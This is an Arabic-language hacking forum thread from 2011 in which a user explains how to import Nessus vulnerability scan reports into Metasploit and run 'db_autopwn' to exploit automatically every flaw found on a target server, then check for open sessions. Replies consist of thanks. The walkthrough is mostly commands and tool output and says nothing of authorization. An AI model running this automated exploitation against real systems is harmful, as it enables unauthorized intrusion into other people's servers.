:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   MetaSploit (http://www.vbspiders.com/vb/forumdisplay.php?f=196)
-   -   ~~~~Nessus with Metasploit By HeaDShoT~~~~ (http://www.vbspiders.com/vb/showthread.php?t=42595)

head-shot 02-04-2011 01:45 AM
~~~~Nessus with Metasploit By HeaDShoT~~~~
 

http://dc01.arabsh.com/i/00239/zmu0xaz6j6uo.png
http://front1.monsterup.com/upload/1282841282954.gif
أهلا و سهلا بكافّة الإخوة الأعضاء و الزوّآر في منتديات VBSPIDER
ندعوكم لمتابعة هذاا الموضوع الجديد إن شاء الله تعـالى ..

نكمل درس سابق في nessus لكن مع استغلاله في هجوم autopwn معروف في metasploit
[COLOR="rgb(0, 100, 0)"]إن شاء الله يعجبكم شرح [/COLOR] http://www.tunisia-server.com/vb/images/tn/drunk.png
===============================================
أولاً نبدأ على بركة الله بنقطة وهي يجب تسجيل تقرير الفحص بعد كل فحص وطريقة كتالي
http://www.offensive-security.com/w/.../cb/Nessus.png
كود PHP:
Export name_of_fichier.nbe 
أو ستجد عند ضغط على فحص عند مايكمل
كود PHP:
Download name.nessus 
ثم الأن سنتنقل لكيفية إستغلال هذا تقرير مع metasploit
أولاً نفتح msfconsole
كود PHP:
root@bt4:/pentest/exploits/framework3# ./msfconsole 
ثم نضغط تالي :
كود PHP:
msf db_create 
كود PHP:
msf load db_tracker 
نحن أن عملنا قاعدة بيانات الأن سنضغط على help لنرى options موجودة
كود PHP:
msf help.

Database Backend Commands
=========================

    Command               Description
    -------               -----------
    db_add_host           Add one or more hosts to the database
    db_add_note           Add a note to host
    db_add_port           Add a port to host
    db_autopwn            Automatically exploit everything
    db_connect            Connect to an existing database
    db_create             Create a brand new database
    db_del_host           Delete one or more hosts from the database
    db_del_port           Delete one port from the database
    db_destroy            Drop an existing database
    db_disconnect         Disconnect from the current database instance
    db_driver             Specify a database driver
    db_hosts              List all hosts in the database
    db_import_amap_mlog   Import a THC-Amap scan results file (--m)
    db_import_nessus_nbe  Import a Nessus scan result file (NBE)
    db_import_nessus_xml  Import a Nessus scan result file (NESSUS)
    db_import_nmap_xml    Import a Nmap scan results file (-oX)
    db_nmap               Executes nmap and records the output automatically
    db_notes              List all notes in the database
    db_services           List all services in the database
    db_vulns              List all vulnerabilities in the database

msf 
أن لنذهب ونأتي بتقرير nessus *.nbe ثم نضغط على db_hosts لإظهار هدف الذي عملنا له فحص
كود PHP:
msf db_import_nessus_nbe /root/namefile.nbe
msf db_hosts[*] Timedate Hostip Statusalive OS
أن نضغط أمر تالي لإظهار خدمات شغالة في سرفير هدف
كود PHP:
msf db_services 
وأن نظهر ثغرات التي وجدت في سرفير من خلال nessus بالأمر تالي

كود PHP:
msf db_vulns 
وأخيراً ننفذ هجومنا autopwn واللذي سيعمل على ثغرات اللتي وجدت من خلال nessus

كود PHP:
msf db_autopwn --
ثم نضغط على لنرى هل حصلنا على إتصل أو لا
كود PHP:
msf sessions -
اتمنى أن الموضوع أعجبكم
أخوكم HeaDShoT من تونس
http://img196.imageshack.us/img196/4276/13941662.gif

the godfather 02-04-2011 01:53 AM
مشكور على الموضوع الأكثر من رائع و nessus مع الميتا رهيب

Hαcĸer'ѕ Kιɴɢ 02-04-2011 02:00 AM
بارك اله فيك
واصل ابداعاتك

head-shot 02-04-2011 04:07 PM
شكراً على مرور انتظرو موضوع جديد أخوكم من تونس

Cyber Code 02-06-2011 09:16 PM
جزاك الله خير , واصل ابداعك وإلى الأمام

في امان وحفظ الرحمن


الساعة الآن 06:24 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0